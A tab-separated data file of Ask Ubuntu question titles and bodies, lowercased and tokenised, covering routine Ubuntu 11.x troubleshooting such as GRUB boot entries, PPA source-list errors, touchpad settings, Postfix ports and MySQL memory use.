82700	i tried adding the gnome 3 ppa , but now get error : failed to load the package list	i added the gnome 3 ppa , to try to install the newst version of the epiphany web browser , as recommended on a web site @ http : //www.omgubuntu.co.uk/2011/11/how-to-install-epiphany-web-app-mode-in-ubuntu/ , only to get the following error upon doing so : failed to load the package list . this is a serious problem . try again later . if this problem appears again , please report an error to the developers . the error message within the scrollable frame states : e : type 'n ' is not known on line 1 in source list /etc/apt/sources.list.d/gnome3-team-gnome3-oneiric.list is there a way of easily fixing this , or do i need to reinstall the system , which is what i did the last time i had a serious ppa/install error ? when i run , sudo apt-get update , i get this in returned : e : type 'n ' is not known on line 1 in source list /etc/apt/sources.list.d/gnome3-team-gnome3-oneiric.list e : the list of sources could not be read .
82704	daemon or crontab ?	i understood that i can create a service that would run and perform certain tasks in the background . but i actually only need to execute a task that needs to be done every 5 minutes . it needs not to run in between . now i was thinking that it may be a better idea to have a crontab entry that runs the ( python ) download script every 5 minutes . i am new to linux and may have an incorrect understanding of what cron is for and what good practices are , but to me it seems as if this is a much more stable way because if the script would halt for any reason it will just be re-run . what would be the recommended approach in that case ? a ( well-behaved ) daemon that waits 5 minutes , or a cron that runs a script that just stops when done .
82711	how can i restore the login screen ?	i used `` ubuntu tweak '' to deactivate the login/users screen in order to save time ( with not giving the password ) . it worked . it was ok . but now i need to create another user . i did create another user and i went back to `` ubuntu tweak '' ; i reset the option about showing the login/users screen , but it does not work . after starting up my machine , it goes directly to my account , showing me my desktop . how can i restore the login/users screen ? ( i have tried uninstalling/purging ubuntu tweak and reinstalling it , but nothing changed )
82718	syncing iphone with shotwell	is it possible to have shotwell automatically sync with my iphone so i have my picture library on both ?
82719	ca n't log into ubuntu 11.04	i recently dual booted my pc with ubuntu 11.04 and windows 7 . it all worked fine for a few days but one day i logged in and instead of getting the log-in screen , i got this : busybox v1.17.1 ( ubuntu 1:17.1-10ubuntu1 ) built-in shell ( ash ) enter 'help ' to see a list of built-in commands . i have n't been able to fix it . how do i get the user interface back ?
82720	ubuntu customization kit error	i am trying to use uck but i got this error when i ran it : i ran it from the source ( svn repo ) , not the deb package . build ( /home/joel/uck-2.4.5/uck-gui ) started at 2011-11-25 15:38:56 sudo : no tty present and no askpass program specified build ended at 2011-11-25 15:39:17 i chose `` en '' then yes to all questions and i got this error . why ?
82724	aspire one freezing due to network	i have had this problem twice , once when i installed 10.10 and now when i install 11.10 . when i boot it tries to automatically connect to my wireless internet , witch is not a problem , but it seems that whenever it does this , the system will freeze completely . it works fine if i boot into safe mode and disable the network manager . but even when i 'm running the live-cd and i go up to the network selector , as soon as i click it freezes . it is an acer aspire one 722-bz454 .
82727	kile does not get keyboard input , respond to alt+f	i use 11.10 with gnome 3 and unity . in either case , i use two kde apps a lot - kile and kate . since the latest upgrade , i have observed a few problems : a ] i can never use alt+f to select the file menu ( works with other apps ) , yet when i press alt , kile 's menu comes up in the status bar . b ] a few times every day , while using kile ( have n't used kate as much recently ) , the keyboard stops responding ( just in the 'editor ' portion , rather than in structure-tree navigation ) . i can not enter any text , but mouse works fine . i usually restart kile to continue working . one inconsistent way to reproduce it ( multiple times today ) : i cut text from one open document using ctrl+x switched to another document in the same kile window using ctrl+tab , then this happened . c ] sometimes , in kate , i can type in the editor but the keyboard wo n't work in the file open dialog . how do i fix the above ?
82731	how to downgrade php from 5.3.x to 5.2.x	i need to downgrade my php to 5.2.x from 5.3.x certain software i currently use requires it . i found all these link explaining how to do it but they no longer work because they show you how to use the karmic archives to downgrade but as those archives no longer exist on archive.ubuntu.com downgrade php to php5.2 ? how to downgrade from php 5.3 to php 5.2 in ubuntu 10.10 maverick
82733	no sound in king arthur 's gold using alsa	my alsa works fine system-wide , but in king arthur 's gold , it refuses to work . it returns line in console : could not load libasound.so i 'm posting this issue here too in the hopes that there is someone that can figure this problem out . in the forums , there has been talk that installing lib32asound2-dev fixes the issue . but i 'm using a 32 bit system . as far as i know , lib32asound2-dev is only for 64 bits ... try installing the game to see what i mean - it 's a very small size and pretty neat . using 11.10 32 bit thanks !
82735	add extra shortcuts to the ubuntu launcher quick keys	my problem is that the ubuntu launcher has shortcut numbers assign to the first 10 . how can i extend this to more of them , like letter or more numbers . is this possible ?
82739	looking for a button or shortcut for accessing google chrome 's create application shortcut feature - any ideas ?	in google chrome , their extremely useful create application shortcuts is buried under wrench icon > tools > create application shortcuts . i 'd really like a chrome button , bookmarklet or a even desktop or unity launcher to make accessing this menu a one-click process . even if someone knew the command flag for opening the create application shortcuts prompt that would be a great help . thanks !
82740	help configuring synaptics touchpad	edit : i can achieve point 1 now . still need a solution for point 2 , though . i am having a hard time configuring my notebook 's touchpad . the touchpad already works . it successfully responds to one-finger tap , two-finger tap and two-finger vertical scrolling . what i want to accomplish : change two-finger tap action from right-mouse click to middle-mouse click add three-finger tap functionality to yield right-mouse click action ( i have checked that the three-finger tap is supported by my laptop 's touchpad since it works on windows ) i read on a forum to use this as a guide . i have successfully accomplished point 1 with synclient tapbutton2=2 . however , i have to do it everytime i log in . i have tried to put that command on /etc/rc.local but the computer always boots and logins with the default configuration . regarding point 2 , i have tried synclient tapbutton3=3 but it does n't do anything when i three-finger tap the touchpad . i am running ubuntu 11.10 on an asus n82jv . /etc/x11/xorg.conf : nuno @ mozart : ~ $ cat /etc/x11/xorg.conf section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' option `` tapbutton1 '' `` 1 '' option `` tapbutton2 '' `` 2 '' option `` tapbutton3 '' `` 3 '' endsection /usr/share/x11/xorg.conf.d/50-synaptics.conf : nuno @ mozart : ~ $ cat /usr/share/x11/xorg.conf.d/50-synaptics.conf # example xorg.conf.d snippet that assigns the touchpad driver # to all touchpads . see xorg.conf.d ( 5 ) for more information on # inputclass . # do not edit this file , your distribution will likely overwrite # it when updating . copy ( and rename ) this file into # /etc/x11/xorg.conf.d first . # additional options may be added in the form of # option `` optionname '' `` value '' # section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' option `` tapbutton1 '' `` 1 '' option `` tapbutton2 '' `` 2 '' option `` tapbutton3 '' `` 3 '' endsection xinput list : nuno @ mozart : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft microsoft® nano transceiver v2.0 id=12 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft microsoft® nano transceiver v2.0 id=13 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=16 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ usb2.0 2.0m uvc webcam id=10 [ slave keyboard ( 3 ) ] ↳ microsoft microsoft® nano transceiver v2.0 id=11 [ slave keyboard ( 3 ) ] ↳ asus laptop extra buttons id=14 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=15 [ slave keyboard ( 3 ) ]
82742	boot problems w/ external hdd	i 'm having a problem with booting a live image off of a usb hard drive . i used startup disk creator to make an ubuntu 11.10 live image on a partition on my external so that i can use it on various computers . i set it up with ~4gb of persistent data so far i 've tried it on two computers . one , a dell , will boot to my external but it loads the select boot device very slowly . it hangs on a screen with an underscore for up to 5 minutes until it allows me to select which drive i want to boot from . after that , it works great . however , on my primary computer it does n't work at all . it 's an acer from 2009 and it wo n't even recognize the drive . i do n't see it anywhere in bios or the select boot disk list . the light on the external will come on at boot just fine so i know it 's powering it at this time . both computers worked perfectly with my 4gb flash drive that i had partitioned half and half ( 1st half fat32 and second ubuntu 11.10 live )
82746	where is the 3d windows setting for the cube in compiz open gl for gnome 3.2 ( ubuntu classic ) configuration manager ?	incredibly useful when working with a lot windows open but missing on compizconfig setting manager in 11.10 x86 desktop version . i was copying my settings from my big 10.04 64bit workstation , but the 3d windows checkbox on the 10.04 workstation is not found on the 11.10 32bit workstation . the screenshot of `` opengl window and composting manage '' in ubuntu software center displays the 3d windows prominently . what 's happening ?
82747	update manager not working	hi when i try to press check button in updated , it is not looking for updates available . getting below error . `` failed to download repository information '' check your internet connection.. w : gpg error : http : //archive.canonical.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //archive.canonical.com lucid release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric_main_source_sources hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . ubuntu version 11.10
82752	sound stops working on xfce 11.10	i installed ubuntu 11.10 , then turned it into xfce . it works , but sometimes the audio will stop working , requiring a reboot to fix it . this will happen in the middle of a video , played using vlc . i 'm on a dell latitude e6400 . this never happened on a straight ubuntu distro in almost 2 years of use , so i 'm pretty sure it 's not the hardware . what do i do to diagnose this problem when it happens again ?
82755	how to get icedtea7-plugin ?	on ubuntu 11.10 ( oneiric ) , i installed openjdk-7-jre openjdk-7-jdk but could not find icedtea7-plugin . how to get the plugin ? $ java -version java version `` 1.7.0_147-icedtea '' openjdk runtime environment ( icedtea7 2.0 ) ( 7~b147-2.0-0ubuntu0.11.10.1 ) openjdk 64-bit server vm ( build 21.0-b17 , mixed mode )
82759	error : you need to load the kernel first in grub	i have lubuntu 11.10 installed on /dev/sda3 , and xubuntu 11.10 on /dev/sda5 . a while ago , while being on lubuntu , i made a mistake somewhere in creating a live usb : by mistake , i installed a live usb bootloader into /dev/sda3 . this did n't result in any problem at that time . today , i updated the kernel . i had to restart lubuntu . in grub , lubuntu suddenly did n't appear anymore , and i booted automatically in xubuntu . i tried to run update-grub and tried to use grub-customizer to get lubuntu back in grub , but this did n't work . i ran os-prober , but it does n't show me lubuntu . then , i tried to add a new entry to /etc/grub.d/ on /dev/sda5 called 12_lubuntu . it contained the following : # ! /bin/sh -e echo `` lubuntu '' cat < < eof menuentry `` lubuntu '' { set root= ( hd0,3 ) linux /boot/vmlinuz initrd /boot/initrd.img } eof after doing that , i ran update-grub and with grub-customizer , i wrote the grub-configuration to mbr , that is : /dev/sda . suddenly , lubuntu appeared in grub . i tried to launch it , but when doing this , the following messages appeared : error : file not found error : you need to load the kernel first the output of ls -all in /dev/sda3 is as follows : gijs @ gijs-pc : /media/9c715f68-f083-46ab-9d55-6139556f31d4 $ ls -all totaal 112 drwxr-xr-x 23 root root 4096 2011-11-25 23:35 . drwxr-xr-x 5 root root 4096 2011-11-26 10:55 .. drwxr-xr-x 2 root root 4096 2011-11-22 22:17 bin drwxr-xr-x 4 root root 4096 2011-11-25 23:36 boot drwxr-xr-x 2 root root 4096 2011-10-15 21:58 cdrom drwxr-xr-x 5 root root 4096 2011-10-12 18:08 dev drwxr-xr-x 146 root root 12288 2011-11-25 23:37 etc drwxr-xr-x 3 root root 4096 2011-10-15 21:59 home lrwxrwxrwx 1 root root 37 2011-11-25 23:35 initrd.img - > /boot/initrd.img-3.0.0-14-generic-pae lrwxrwxrwx 1 root root 33 2011-11-25 23:35 initrd.img.old - > /boot/initrd.img-3.0.0-14-generic drwxr-xr-x 19 root root 4096 2011-11-22 22:17 lib drwx -- -- -- 2 root root 16384 2011-10-15 21:56 lost+found drwxr-xr-x 5 root root 4096 2011-11-24 20:59 media drwxr-xr-x 2 root root 4096 2011-10-09 09:29 mnt drwxr-xr-x 4 root root 4096 2011-11-24 17:15 opt drwxr-xr-x 2 root root 4096 2011-10-09 09:29 proc drwx -- -- -- 13 root root 4096 2011-11-22 17:19 root drwxr-xr-x 5 root root 4096 2011-10-15 22:01 run drwxr-xr-x 2 root root 4096 2011-11-22 22:17 sbin drwxr-xr-x 2 root root 4096 2011-06-21 20:43 selinux drwxr-xr-x 2 root root 4096 2011-10-12 18:06 srv drwxr-xr-x 2 root root 4096 2011-07-14 07:11 sys drwxrwxrwt 8 root root 4096 2011-11-25 23:37 tmp drwxr-xr-x 10 root root 4096 2011-10-12 18:06 usr drwxr-xr-x 13 root root 4096 2011-11-25 23:37 var lrwxrwxrwx 1 root root 33 2011-11-25 23:35 vmlinuz - > boot/vmlinuz-3.0.0-14-generic-pae lrwxrwxrwx 1 root root 29 2011-11-25 23:35 vmlinuz.old - > boot/vmlinuz-3.0.0-14-generic i 've also found the old 30_os-prober_proxy in /dev/sda3/etc/grub.d , which should contain the old boot stuff . it is as follows : # ! /bin/sh # this is a grub proxy script '/etc/grub.d/proxifiedscripts/os-prober ' | /etc/grub.d/bin/grubcfg_proxy `` -* -'ubuntu , met linux 3.0.0-12-generic-pae ( on /dev/sda3 ) ' -'ubuntu , met linux 3.0.0-12-generic-pae ( herstelmodus ) ( on /dev/sda3 ) ' +'ubuntu , met linux 3.0.0-12-generic ( on /dev/sda3 ) ' as 'xubuntu' -'ubuntu , met linux 3.0.0-12-generic ( herstelmodus ) ( on /dev/sda3 ) ' +'windows 7 ( loader ) ( on /dev/sda2 ) ' as 'windows 7' '' how can i make grub start lubuntu again ?
82762	why does update-grub not find ubuntu 11.10 ?	i 've recently installed ubuntu onto my laptop . with the intention of dual booting with windows 7 . on installation grub was n't loading , the computer continued to boot straight into windows . i loaded a live cd , mounted the installed ubuntu partition ( sda6 ) as /mnt/ and windows boot partition as /mnt/boot following the second option here . through its entirety , so creating a new grub.cfg file . chroot /mnt update-grub did not find ubuntu , just windows 7 and the windows recovery partition . thinking this might be a weird quirk that as i was in ubuntu ( all be it a live cd ) it might not list ubuntu i restarted . grub loaded but ubuntu was nowhere to be seen . how can i add ubuntu with grub2 ? i could have fixed this myself in old grub but i 'm pretty much in the dark here . thanks
82763	not able to install certain gnome-shell extensions	i have ubuntu 11.10 installed , and i use both gnome shell and the unity interface . this post is about a few problems that i am facing with gnome shell extensions . i have a few gnome-shell extensions installed . for example , gnome-shell-extensions-pidgin , message notifier , etc . i also have the gnome-shell-extensions-common package installed which is required for fulfilling dependencies . now , whenever i am trying to install a few other extensions such as dock , user-theme , etc. , the installation is complaining that there is a broken dependency with gnome-shell-extensions-common package , and that it is not being installed . however , i already have the package installed . probably , as a result , gnome-tweak-tool is also not able to activate the gnome-shell extensions . any help as to why this issues is occurring would be appreciated .
82764	why ca n't i hibernate using uswsusp if freeplain or some websites are open ?	i installed uswsusp on my laptop to hibernate faster , which works most of the time , but whenever i have freeplane ( and some websites in firefox , ca n't recall which ones but can probably find some ) it fails . in order to hibernate , i have to resort to closing the offending program or webpage , but this ruins the point of hibernating . it fails when i try sudo s2disk in a terminal with freeplane open , but strangely works with sudo s2ram -- force . when it fails , it simply switches to the black screen with s2disk : snapshotting system but then returns to the login screen . when i enter my password , the hibernating indicator continues flashing but goes back to the desktop i left when trying to hibernate . when it works , it works as expected from hibernate , shutdown and resume . i saw another thread discuss fglrx modules and to include it in module= '' fglrx '' in /etc/default/acpi-support , but that has n't helped me . i 'm using ubuntu 11.10 with an ati graphics card on an acer aspire 6920 .
82767	how do i change the background colour of leafpad ? ( changing .gtkrc insufficient )	all the information that google returns says to change ~/.gtkrc2.0-mine . here is my .gtkrc-2.0 : # -- theme auto-written by gtk-theme-switch2 do not edit include `` /usr/share/themes/dust/gtk-2.0/gtkrc '' include `` /home/mars/.gtkrc-2.0.mine '' # -- theme auto-written by gtk-theme-switch2 do not edit here is my .gtkrc-2.0.mine : style `` default '' { gtktextview : :cursor_color = `` # ffffff '' base [ normal ] = `` # 111111 '' base [ active ] = `` # 111181 '' base [ selected ] = `` # 808080 '' text [ normal ] = `` # c0c0c0 '' text [ active ] = `` # c0c0c0 '' text [ selected ] = `` # 111111 '' } class `` gtktextview '' style `` default '' still appears with a white background !
82770	how to make a .deb installer for pyside ( qt ) project	i have made a small software using pyside , a gui library for python using qt . i have successfully built it into an executable for ubuntu . http : //download.ueseo.org/sitemap-creator/sitemapcreator2.1-ubuntu % 20portable-onefile.zip i hope to make a .deb installer for my software too . can someone give me some help ? i have tried many tutorials on the web , but neither work for me.thanks in advance .
82771	how to install windows 8 developer preview on ubuntu computer ?	i have ubuntu 11.04 on this computer and i want to install windows 8 developer preview english , 64-bit ( x64 ) on it via dvd . i burned it both using brasero on ubuntu and using the standard mac instructions from the ubuntu website . my bios refuses to boot off of both dvds when it boots off other cds just fine . how can i do this ? if it helps , i have a windows computer as well .
82773	amd 6870 twin frozr ii video adapter issues	hardware : amd 6870 twin frozr ii ( 1gb ) , asus 990 chipset software : ubuntu 11.10 built a new pc from scratch , loaded it with ubuntu 11.10 . it 's displaying , but with poor resolution , unable to change , as it says no drivers are installed . ubuntu indicates that there are 2 proprietary drivers available to download : ati/amd proprietary fglrx graphics driver ( post-release update ) ati/amd proprietary fglrx graphics driver the first wo n't even finish downloading . the second downloads and installs , but when i restart the pc as requested it boots up , i see purple in the background , then the video feed just stops with a black screen . i can still hear ubuntu boot up though . it seems like i just need the latest drivers , googled around and not had much luck . i 'm pretty new with ubuntu , but have basic knowledge . any potentially helpful information would be welcome .
82774	how to configure postfix to connect to port 26 on the remote host ?	my isp blocks outgoing connections to port 25 ( well , with one exception for their smtp server ) . the remote host for one particular email address is also configured to listen on port 26 . is there any way of configuring postfix to connect to port 26 on the remote host ?
82776	how can i enable gnome shell extensions with ubuntu 11.10 ?	i am having a problem similar to that asked ( and solved ) here : ca n't enable gnome shell extensions . i have performed both of the `` tweaks '' explained in that solution ( i.e. , here and here ) ; but that does not seem to help . my gnome-shell is version 3.2.1 . when i run gnome-tweak-tool from a shell , i get the following output : critical : unknown extension error critical : unknown extension error critical : unknown extension error critical : unknown extension error critical : unknown extension error critical : unknown extension error critical : unknown extension error ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:7823 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed has anyone actually solved this besides to the references above ? i have made the suggested modifications from those sites .
82779	how do i keep some drivers from old kernel ?	my bluetooth dongle drivers were in kernel 2.6.38 . since then it never worked with any new kernel . so my only way to use it is to boot into old kernels . but i want to update kernel to 3.1 with new drivers except bluetooth . can patching do this ?
82780	i am no longer in sudoers ?	jiewmeng is not in the sudoers file . this incident will be reported . whats happening ? its a home pc with me as the only user . i noticed this only happended recently . perhaps after some recent update . i was running sudo add-apt-repository ...
82786	network bridge disconnects and reconnects to xbox 360	i am trying to setup a network bridge to my xbox 360 , but the wired connection notifies me that it is connected,5 seconds later it notifies me it disconnected , and it keeps in a cycle until i disconnect the ethernet cable . my xbox notifies my that it ca n't obtain an ip address , and that there is no connection . all of this worked perfect in ubuntu 11.04 , is there something different in 11.10 ? or am i choosing the wrong settings ?
82788	activate pdf/x-3 support in scribus	i am running ubuntu 11.10 with scribus 1.4.0.rc3 and created a photo book that i would like to get printed now . from what i understand i should be using pdf/x-3 as compatibility level for the pdf export . however even after following the instruction on the scribus1 site to activate color management i ca n't seem to be activating the option . it never shows up in the compatibility drop down for the pdf export . what am i missing ?
82790	kmail2 really slow	ever since migrating to kubuntu 11.10 and the forced migration to kmail2 with the akonadi backend i am having serious performance problems . is there some sort of maintenance or cleanup task that i can run to optimize it . i have large maildir based emails dating back to 2000 and would really like to keep having all around but worst case i might have to back it up and start fresh . any tips to avoid this ?
82792	bluetooth recognized but can not establish connection on lenovo g460 laptop	/ i have a lenovo g460 laptop . after enabling bluetooth in my system , it does recognize my bluetooth headset . pairing status also shows yes but connection status always shows as off please help me if i need any software to enable the connection . in emulator , i have tried few things on my own , and i 'm unclear but its failing at the step while testing scm audio drive .
82794	questions on vim-addon-manager	i am using this addon manager for vim . after installation , i can install scripts like taglist.vim , but i ca n't install the script octave.vim : vim-addon-manager complained that no repository location info known for plugin octave . according to this page , i ran : call vam # install # loadknownrepos ( ) , but vim complained that there are not enough arguments for the function . can anyone give hints for me ? thank you .
82795	how can i install ubuntu without overwriting my windows os ?	i am totally new to the world of computer os installation . i have used windows softwares like ms office etc . but never really formatted any pc or installed any os . i dared to install vmware and run ubuntu on it . however , i find it very slow . i am curious to explore ubuntu fully and need step by step guidance on how can i install ubuntu on my pc without deleting the windows os that i am using now . i want my pc to have both the os.i also want to know whether i can buy a new hard disk and dedicate it fully for ubuntu . kindly help .
82798	sharing folders between ubuntu computers fails	i am attempting to share files between two computers running 11.10 . i 'm using the built-in samba sharing . when i try to mount the files on another computer it says `` failed to mount windows share '' . i have no clue how to get this working . thank you in advance .
82802	how to get ubuntu windows client to sync	i have just starting using u1 and it sounds like a ready nice service , but am having no luck getting it to work , and looking for some help . i am trying to upload a 3gb .iso file , and a 400mb .iso file . i have tried the web interface , and left the upload going for about 17hours , and it just says `` please wait '' . i tried a tiny 9.3mb file and uploaded in a couple of minutes . i then installed the windows client ( on an xp pro machine ) and selected the folder to sync . `` my docs\downloads\ '' and it says `` file sync is up to date '' i have disconnected and reconnected as the faq 's suggested to force sync , no joy . restarted pc etc , and no luck . keen to hear from anyone that has some helpful suggestions to try . would really like to get this working . cheers
82803	hard drive clicking noise on acer ao722	i 'm running ubuntu 11.10 on an acer aspire one 722 . whenever i 'm on battery power i get a clicking sound from my hard drive every 5 seconds or so ( this does not happen when the laptop is plugged in ) . i 'm dual booting with windows 7 and i do n't get the clicking sound in windows . the clicking sound stops when i run the command : sudo hdparm -b 254 /dev/sda also , according to : sudo smartctl -h /dev/sda my hard drive is healthy . is this clicking sound something i can just ignore ? or is it a serious problem and will it eventually damage my computer ? if so , how would i fix it ? i have tried adding hdparm -b 254 /dev/sda to my /etc/rc.local file , but i still run into the clicking problem if my computer boots while plugged in and is then unplugged . also , i 'm finding this fix to be unreliable . sometimes it works , sometimes it does not . is this a good solution and is there a better way of doing this ? also , would running my laptop with a -b value of 254 have any negative effects ? ( i read somewhere about a lower level protecting the hard drive from bumps )
82804	how to add winxp partition in grub	i have 2 hardisks : one of 40gb with 2 installations of windows xp ( one in fat and another ntfs ) , and another hardisk of 200gb with a backtrack installation , ubuntu installation and a ntfs partition . after installing ubuntu and backtrack i do n't have the boot entries to get into windows xp anymore . in grub i can see only backtrack and ubuntu . how can i add in windows xp entries and have the option to select from any of my four oses after booting ? any suggestions would be really helpful .
82808	is it safe to sleep computer while updating software ?	update is taking a long time but i need to close the lid of my laptop and go ( i 'm not upgrading version , just a regular update ) . is this safe ?
82809	i have successfully burned ubuntu ( correctly ) but my mac wont boot up from the cd	i have successfully burned ubuntu ( correctly ) on to a blank cd and i 'm trying to try it out on my mac now . but when i restart it just boots up with the normal mac operating system . help ?
82812	backup contacts from windows mobile 6.5 to google account	i wanted to backup my contacts from a windows mobile 6.5 phone ( samsung omniapro b7320 ) to my google account . i could use pim backup when i still use windows and upload it to the google account , but since my conversion to ubuntu , i have no clue .
82814	is the logitech c310 webcam compatible ?	does the logitech c310 webcam work in ubuntu 11.10 ? do we require any drivers to install that webcam on ubuntu 11.10 ?
82815	how can i find from console what version of ubuntu i 'm using	there should be some easy command to find from console what version of ubuntu i 'm using .
82823	ubuntu server on virtualbox	i have two network adapters on virtualbox for ubuntu server . adapter 1 : internal network called intent adapter 2 : nat i want to configure them as follows , static ip 192.168.10.101 for the internal network adapter netmask 255.255.255.0 dhcp ip for the nat adapter how can i do this ?
82825	do files at /etc/apt/sources.list.d need to have an extension '.list ' ?	in /etc/apt/sources.list.d i have several files for custom repositories . all the names of those files end with .list . is it obligatory that files in that folder should end with that extension ? if yes , where is that information written ?
82827	why does my server only uses 3gb of memory	the server has 24 gb of memory and 4 quad-core cpu 's . it runs a busy website on apache/mysql/php and sometimes gives a message that the server load is too high . when i look at the logs it never uses more then 3 gb of memory which seems strange too me . this could be a mysql or apache setting . here some data uname -a linux s2274 2.6.32-32-server # 62-ubuntu smp wed apr 20 22:07:43 utc 2011 x86_64 gnu/linux free -m total used free shared buffers cached mem : 24153 20951 3201 0 125 17719 -/+ buffers/cache : 3106 21046 swap : 11240 14 11226 as you can see it says here that there is 20 gb in use . but when i look at top/htop it never comes above 3092 usage . the processors are not really active , average load is 0.9 . could i increase somehow the memory that is used by apache and/or mysql to see if it can use alle memory ? sorry , i was away for a while ... .. here is the output from the mysqld command : 120108 8:48:21 [ note ] plugin 'federated ' is disabled . -- binlog_cache_size= # -- bulk_insert_buffer_size= # -- delayed_queue_size= # -- join_buffer_size= # -- key_buffer_size= # the size of the buffer used for index blocks for myisam -- key_cache_block_size= # -- max_binlog_cache_size= # -- max_binlog_size= # binary log will be rotated automatically when the size max_relay_log_size is 0 . the minimum value for this -- max_heap_table_size= # -- max_join_size= # joins that are probably going to read more than max_join_size records return an error . -- max_relay_log_size= # the size exceeds max_binlog_size . 0 excepted , the minimum -- myisam_block_size= # -- myisam_data_pointer_size= # -- myisam_max_extra_sort_file_size= # -- myisam_max_sort_file_size= # -- myisam_sort_buffer_size= # -- preload_buffer_size= # -- profiling_history_size= # -- query_alloc_block_size= # -- query_cache_size= # -- query_prealloc_size= # -- range_alloc_block_size= # -- read_buffer_size= # -- read_rnd_buffer_size= # -- record_buffer= # alias for read_buffer_size -- sort_buffer_size= # -- thread_cache_size= # -- tmp_table_size= # if an internal in-memory temporary table exceeds this -- transaction_alloc_block_size= # -- transaction_prealloc_size= # binlog_cache_size 32768 bulk_insert_buffer_size 8388608 delayed_queue_size 1000 join_buffer_size 12582912 key_buffer_size 805306368 key_cache_block_size 1024 max_binlog_cache_size 18446744073709547520 max_binlog_size 104857600 max_heap_table_size 805306368 max_join_size 18446744073709551615 max_relay_log_size 0 myisam_block_size 1024 myisam_data_pointer_size 6 myisam_max_extra_sort_file_size 2147483648 myisam_max_sort_file_size 9223372036853727232 myisam_sort_buffer_size 25165824 preload_buffer_size 32768 profiling_history_size 15 query_alloc_block_size 8192 query_cache_size 805306368 query_prealloc_size 8192 range_alloc_block_size 4096 read_buffer_size 25165824 read_rnd_buffer_size 25165824 sort_buffer_size 25165824 thread_cache_size 256 tmp_table_size 805306368 transaction_alloc_block_size 8192 transaction_prealloc_size 4096 the php memory_limit is 128m i see that 3 gb limit in several situations . f.i . htop , top and when i log in to webmin in the server status . ( yes i use webmin since i do a lot of management from my ipad ; ) ) i will try to add a screenshot here ...
82829	how to install xml parsers with python	i 'd like to use etree , expat or similar , though i understood etree is easier to use . but how do i install that when i already have python 2.7.2 installed on ubuntu 11.10 ? all documentation i can find through google suggests that xml parsing is available by default for python . or at least when i search for install xml parser python , or any combination of similar words , also including etree or expat i ca n't find what steps to take ( a commandline install method ) .
82835	how do i update ubuntu server ?	i 've ubuntu server 11.04 . i want to update packages but not the core . for example , i installed subsonic with apt-get . and i see there is a new version . i could install it manually by downloading the archive and using dpkg . but hey , its better to learn how to use new tricks . p.s . apt-get upgrade will not list subsonic . why ?
82837	how do i make the caps lock key a third shift key ?	how do i make the caps lock key work just like another shift key ? there are loads of questions here about reassigning it , or having it launch a custom command . i just want it to work like another shift key . i do n't want any other keys to change what they do , just that one . keyboard layout/caps lock key behavior wo n't do it , i do n't understand how to remap it in ccsm . i 'm using a uk keyboard now but i learned to type on a us keyboard , the smaller left shift key is driving me nuts .
82838	what 's the maximum filename length in encrypted ext4 partition ?	i 'm using a two-partition setup with ubuntu ( one partition for the system , one for my home directories ) . until now i had an ext3 formatted home partition , which i 'm currently trying to migrate to an encrypted ext4 partition . however , when copying the files the system is bugging me with errors , complaining that filenames are too long . as far as i could find out using wikipedia filename length is 255 bytes for ext3 and 256 bytes for ext4 . so where 's the problem , and how can i solve it ? thanks !
82839	segmentation fault and other issues after switching to xfce	after switching to xfce.. many apps are segfaulting including virtualbox and monkeystudio . apps like minitube give this warning creating accessible with different object than the original interface ! is there any fix ?
